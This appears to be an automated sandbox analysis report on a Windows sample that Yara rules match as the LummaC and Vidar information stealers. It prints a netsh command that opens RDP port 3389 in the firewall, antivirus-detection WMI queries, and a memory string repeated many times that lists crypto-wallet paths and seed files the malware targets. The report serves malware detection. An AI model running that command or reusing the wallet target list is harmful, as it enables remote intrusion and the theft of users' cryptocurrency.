Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

Source: RegAsm.exe, 00000002.00000002.2452955008.000000000077A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3d45570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3d45570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1144, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
